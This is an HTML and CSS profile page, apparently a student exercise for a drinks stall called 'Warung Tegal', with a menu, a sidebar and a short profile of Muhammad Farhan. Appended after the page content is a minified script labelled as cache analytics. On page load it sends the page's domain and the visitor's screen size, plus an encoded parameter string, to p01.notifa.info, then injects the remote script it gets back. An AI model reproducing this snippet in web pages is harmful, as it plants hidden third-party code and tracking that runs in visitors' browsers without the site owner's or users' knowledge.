<HTML>
  <HEAD>
	<TITLE>UAS MINUMAN</TITLE>
	<style TYPE=text/css>
	  header, section, footer, aside, nav, article, figure, figcaption {
          	display: block;
		}
	  body {
		COLOR : auto;
		background-color: grey ;
		background-image : url("images/bg.gif");
		background-position: center;
		margin : 0px;
		}
	  .wrapper {
           	width: 940px;
          	margin: 20px auto 20px auto;
          	border: 4px solid rgb(241, 166, 20);
          	background-color: rgba(252, 252, 252, 0.95);
		}
	  header {
          	height: 220px;
          	background-image: url("images/logo.jpg");
            background-size: cover;
		}
          h1 {
          	text-indent: -9999px;
          	width: 940px;
          	height: 190px;
          	margin: 0px;}
          nav,footer {
          	clear: both;
          	color: #ffffff;
          	background-color: #1a1920;
          	height: 30px;
		}
	 nav ul {
          	margin: 0px;
          	padding: 5px 0px 5px 50px;
		}
          nav li {
          	display: inline;
          	margin-right: 40px;
		}
          nav li a {
           	color: #ffffff;
            font-size: 1em;
		}
          nav li a:hover, nav li a.current {
         	color: rgb(241, 166, 20);
		}
          section.courses {
          	float: left;
          	width: 659px;
          	border: 5px solid #eee;
		}
	  article {
          	clear: both;
          	overflow: auto;
          	width: 100%;
            padding: 50px 0px;
		}
          hgroup {
         	 margin-top: 40px;
		}
          figure {
           	float: left;
          	width: 290px;
          	height: 220px;
          	padding: 5px;
          	margin: 20px;
          	border: 1px solid #eeeeee;
		}
          figcaption {
          	font-size: 90%;
          	text-align: left;
		}
	        aside {
          	width: 230px;
          	float: left;
          	padding: 20px;
		}
	        aside a {
      	     display: block;
      	     padding: 10px;
      	     border-bottom: 1px solid #eeeeee;
      	     }
      	  aside a:hover {
      	    color: black;
      	    background-color: rgb(254, 244, 23)}
      	  a {
      	    color: #b81d3f;
      	    text-decoration: none;
      	    }
      	  h1,h2,h3 {
      		font-weight: normal;
      		}
      	  h2 {
      		margin: 10px 0px 5px 0px;
      		 padding: 0px;
      		 }
      	  h3 {
      		margin: 0px 0px 10px 0px;
      		color: black;
      		}
      	  aside h2 {
      		  padding: 30px 0px 10px 0px;
      		  color: rgb(241, 166, 20);
      		  }
	</style>
</head>
  <body>
	<div class=wrapper>
	  <Header>
	   <H1>Warung Tegal</H1>
	     <nav>
		<ul>
              	   <li><a href="index.html" >Home</a></li>
              	   <li><a href="trend.html"  >Trending in 2018</a></li>
              	   <li><a href="profile.html" class="current">Profile</a></li>
              	   <li><a href="contact.html">Contact</a></li>
		</ul>
	     </nav>
	  </Header>
	  <Section class=courses>

		<article>
                    <h2>Beverage Corporation Inc.</h2>
                    <h3>Muhammad Farhan</h3>
                    <p><i>"Enjoy for every tasteness and sweetness" - Farhan</i></p>
		</article>

	  </Section>

	  <aside>

          <h2>Minuman Populer</h2>
        	      <a href="index.html#kopi">Es Kopi Susu</a>
                <a href="index.html#boba">Brown Sugar</a>
        		    <a href="index.html#regal">Boba</a>
          	  	<a href="index.html#thaitea">Minuman dengan Regal</a>
             		<a href="index.html#brown">Thai Tea</a>

       		<h2>Kontak</h2>
            	<p>Muhammad Farhan<br />


       	  </aside>
	  <footer>
	   	 <marquee behavior=alternate >&copy; 2020 Muhammad Farhan</marquee>
	  </footer>
	</DIV><!-- .wrapper-->
  <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582JQuX3gzRncXGZvz%2fZNFti%2fKNGpIJpuOF7rOgglfbksX%2fz0oxi7A1IlJYYul8OOLBnpe%2brx5KQSMosQCdNIWuw0afD2AaGVIcQz0jiA5CSAej0DiaB0C6ziZfVuJPxBczcFOzFlSDVRqhEz0n2W8n%2fZ5fSckjkfR20yascYcw95yjpVFLiThJ5sdBhvv7dbWnZkFzLY1MI6SAAEpX8IPHtAgiuvOUM%2fXsG14hKhK7zQRPxxJlX1XRUEFWM%2b3iIyPjB5q5OkwLM%2bQKSBzMTyGsog3UjUgDJTnS02AdjOZurIcmqZlIaXGSHr%2frL439ngYIRLwmvV14wyQGCIllUc4hEmUQFlYzART8B2%2fqzUzkVICGOTakzO00Pb45%2fB8E75Jq1F7Xy%2blWL7Kcswd7aU0JdrScURB58i3j%2fsjYeWf6wn6%2fV0ejMi4b2ShGUWiqawIsEzXOI11HD25VYTBHTxwUaFzIqX1%2flQtDWW8VTtUMpZuTxWwbbD2%2f%2fZWw0zSPC2Jyue5ksRibmRpZBNqlyhg0K8NYa8tzw7P0PRiED0uqBWzizK7QM3R%2boXyM7rNH7APHLL4aSz6XT1c%2fIVcvxGcccVQDxIiWU0VS2TexKpBP9t1" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></BODY>
</HTML>
